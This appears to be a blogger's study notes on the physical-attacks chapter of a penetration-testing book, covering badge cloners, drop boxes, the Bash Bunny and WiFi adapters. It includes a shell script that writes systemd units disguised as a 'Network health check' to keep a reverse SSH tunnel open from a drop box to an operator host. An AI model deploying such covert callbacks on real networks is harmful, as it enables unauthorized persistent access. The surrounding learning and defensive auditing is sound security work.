Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.
Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it.
THP3 06 – The Onside Kick – Physical Attacks
Onto physical security…the area where you are subjecting yourself to physical harm. There are some fantastic stories out there about pentesting physical security. Fantastic, scary, and a good reminder that perhaps physical pentests of facilities with certain levels of security shouldn’t be done. But an interesting chapter. Mr. Robot has a few episodes that show exploiting physical security, and Sneakers had some classic scenes. Physical attacks carry a lot of risks, so be extra careful. A lot of cons have lockpick villages, but just having lockpicks is illegal in some places. So familiarize yourself with local laws. Make sure you’ve got your get out of jail free letter, etc. Since I won’t be running out and picking up all of these tools, this will be a pretty quick write-up.
Card Reader Cloners
Lots of coverage of this in THP2, so I look forward to that when I work through that book. Some badges are vulnerable. ProxCard II badges are specifically mentioned as easy to clone using a Proxmark3 or the more portable Proxmark3 RDV2. I’m not sure whether to be excited or frightened that you can pick up the RDV2, accessory kit, and a 10 pack of cards for less than $500 from Hacker Warehouse. Kim gives a reference to Kevin Chung’s blog post on RFID hacking.
Physical Tools to Bypass Access Points
The LAN Turtle is a drop box option. It seems pretty straightforward to get set up. Kim walks through a complete setup. Something to come back to when I get either a LAN Turtle or a Raspberry Pi to use as a drop box. Kim included additional tips like adding a cron job and setting up separate VPN servers and MAC addresses for each LAN Turtle if you will be using multiple. You may want to look for alternatives to cron jobs as well if you are targeting Linux systems. This Breaking Down Security post has a discussion on systemd and the possibility of using .timer files. Something to keep an eye on at least, because cron jobs are a well-known place defenders look and are sometimes an exploitable vector.
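The systemd alternative to the cron callback, as an added example that is not from the book or the Breaking Down Security post: a `.timer`/`.service` pair that re-establishes a reverse SSH tunnel from the drop box every five minutes, plus a small audit function that lists what every timer in a directory actually runs. The operator host, port, tunnel layout and the unit name `net-health` are all assumptions for illustration.

```shell
#!/bin/sh
# Added example (not the book's code). Drop-box callback as a systemd timer
# instead of a cron job. Assumed: operator host OPS_HOST, port OPS_PORT, an
# unprivileged "callback" account there, and the unit name "net-health".
OPS_HOST="${OPS_HOST:-ops.example.invalid}"
OPS_PORT="${OPS_PORT:-443}"
UNIT_NAME="net-health"

# Writes the service and timer units into $1.
# On a real box that directory is /etc/systemd/system, followed by
# `systemctl daemon-reload && systemctl enable --now net-health.timer`.
write_callback_units() {
    dir="$1"
    mkdir -p "$dir"
    cat > "$dir/$UNIT_NAME.service" <<EOF
[Unit]
Description=Network health check
After=network-online.target
Wants=network-online.target

[Service]
Type=oneshot
# Reverse tunnel: on OPS_HOST, "ssh -p 2222 localhost" reaches the drop box.
# BatchMode prevents a hung password prompt; ExitOnForwardFailure makes a
# refused -R binding a failure the timer will retry instead of a silent no-op.
ExecStart=/usr/bin/ssh -o BatchMode=yes -o StrictHostKeyChecking=accept-new \\
    -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 \\
    -N -R 2222:127.0.0.1:22 -p $OPS_PORT callback@$OPS_HOST
EOF
    cat > "$dir/$UNIT_NAME.timer" <<EOF
[Unit]
Description=Periodic network health check

[Timer]
OnBootSec=2min
OnUnitActiveSec=5min
RandomizedDelaySec=60
Persistent=true

[Install]
WantedBy=timers.target
EOF
}
# Cron equivalent of the timer above, for comparison:
#   */5 * * * * /usr/bin/ssh -o BatchMode=yes -o ExitOnForwardFailure=yes -N -R 2222:127.0.0.1:22 -p 443 callback@ops.example.invalid

# The other direction: for every .timer in $1, print the ExecStart of the
# service it triggers. This is what a responder runs to find a callback like
# the one above, and what you run to confirm your own unit says what you think.
list_timer_execs() {
    dir="$1"
    for t in "$dir"/*.timer; do
        [ -e "$t" ] || continue
        svc="${t%.timer}.service"
        printf '%s -> ' "$(basename "$t")"
        if [ -f "$svc" ]; then
            grep -m1 '^ExecStart=' "$svc" | sed 's/^ExecStart=//'
        else
            echo '(no matching service)'
        fi
    done
}
```

Because the service is `Type=oneshot` and `ssh -N` blocks, systemd will not start a second copy while the tunnel is up; when the tunnel drops, the next elapse of the timer brings it back. `RandomizedDelaySec` keeps several drop boxes from beaconing in lock step, which matters if you follow Kim's advice to run more than one.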
The Packet Squirrel can be used to get connections out and capture traffic. Kim lists several resources to let you use the Packet Squirrel more effectively.
- SWORD dropbox write-up
- Accessing internal networks with reverse VPN connections
- Installing an OpenVPN access server on Ubuntu 15.10
- Setting up a transparent VPN internet gateway
The Rubber Ducky has been covered in previous books. A Bash Bunny is an advanced option. Kim also mentions the KonBoot. Basically there’s a lot of cool stuff out there that you can use or make to conduct physical testing. The Bash Bunny can use QuickCreds or BunnyTap. BunnyTap is based on PoisonTap, which pulls a ton of info from even locked machines. There are also other payloads available.
WiFi attacks have remained fairly stable. WEP is less common, but still used. Wifite2 is Kim’s preferred tool. It works well based on my experiences with it. The most finicky part is often getting your WiFi adapter set up. Kim likes the Alfa AWUS036NHA. I’ve got a Panda Wireless PAU05 that I like because of the small form factor. I’ve also got a TP-Link TL-WN722N. The TP-Link version has been popular in the past, but the newer versions (2.0 and 3.0) aren’t initially set up to run in monitor mode. There are a lot of suggestions out there on how to fix this, but I’ve run into issues with the V3.0 I have. The takeaway is to carefully look at the adapter you decide to get to make sure it will do what you need it to do. I’m happy with the Panda I have and have known others who have had good luck with the Alfa and other Panda models. The WiFi Pineapple Nano is a step up for more advanced attacks. There’s also eaphammer, which can do a lot against WPA2-Enterprise networks.
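The adapter check that saves the most time, as an added example (my own script, not from the book): before trusting an adapter, ask the driver which interface modes it supports via `iw list`, and after switching, confirm with `iw dev` that the interface really is in monitor mode. The `iw list` and `iw dev` sample text below is constructed to match the real output format, not captured from any particular adapter.

```shell
#!/bin/sh
# Added example: verify monitor-mode support before and after switching.
# Only the parsing runs offline; enable_monitor needs root and a real interface.

# Constructed sample of `iw list` output: phy0 supports monitor, phy1 does not.
SAMPLE_IW_LIST="$(printf 'Wiphy phy0\n\twiphy index: 0\n\tSupported interface modes:\n\t\t * IBSS\n\t\t * managed\n\t\t * AP\n\t\t * monitor\n\tBand 1:\nWiphy phy1\n\twiphy index: 1\n\tSupported interface modes:\n\t\t * managed\n\tBand 1:\n')"

# Constructed sample of `iw dev` output: wlan0 already switched to monitor.
SAMPLE_IW_DEV="$(printf 'phy#0\n\tInterface wlan0\n\t\tifindex 3\n\t\twdev 0x1\n\t\taddr 00:11:22:33:44:55\n\t\ttype monitor\n')"

# Usage: iw list | supported_modes phy0
# Prints one interface mode per line for the named phy. The mode list ends at
# the first line that is not a " * mode" bullet (e.g. "Band 1:").
supported_modes() {
    awk -v phy="$1" '
        /^Wiphy / { cur = $2; inmodes = 0; next }
        cur == phy && /Supported interface modes:/ { inmodes = 1; next }
        cur == phy && inmodes {
            if ($0 ~ /^[[:space:]]+\* /) print $2; else inmodes = 0
        }
    '
}

# Usage: iw list | phy_supports_monitor phy0 ; exit status 0 if it does.
phy_supports_monitor() {
    supported_modes "$1" | grep -qx monitor
}

# Usage: iw dev | iface_type wlan0 -> "managed", "monitor", ...
iface_type() {
    awk -v want="$1" '
        /^[[:space:]]+Interface / { cur = $2; next }
        cur == want && /^[[:space:]]+type / { print $2 }
    '
}

# Switch $1 to monitor mode and confirm the kernel agrees. The interface must
# be down to change type; some drivers accept the command and quietly do nothing,
# which is exactly what the final check catches. Needs root; not run offline.
enable_monitor() {
    ifc="$1"
    ip link set "$ifc" down
    iw dev "$ifc" set type monitor
    ip link set "$ifc" up
    [ "$(iw dev | iface_type "$ifc")" = "monitor" ]
}
```

Run `iw list | phy_supports_monitor phy0 && echo ok` on the box with the adapter plugged in; if the phy does not list `monitor`, no amount of `airmon-ng` fiddling will help and the fix is a different driver or a different adapter. `enable_monitor wlan0` does the switch and exits non-zero if the driver silently ignored it.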
Physical attacks are both fun and risky. From a red team perspective, the key is looking for weak spots in physical security and how people respond to potential physical breaches. And another reminder to make sure you’ve got everything clearly spelled out and have your get out of jail info ready to go.
It’s amazing and somewhat disturbing how affordably you can load up on physical pentesting gear. It’s not cheap, but getting geared up to do physical pentesting would not be cost prohibitive in starting a consulting company. I don’t know that physical pentests are something that I’ll be doing in the near future, but it would be fun. I may look into repurposing some devices I have to test some of these attacks.
- Make a conscious effort to observe physical security and think about how to test it
- Check out the lockpick village at a con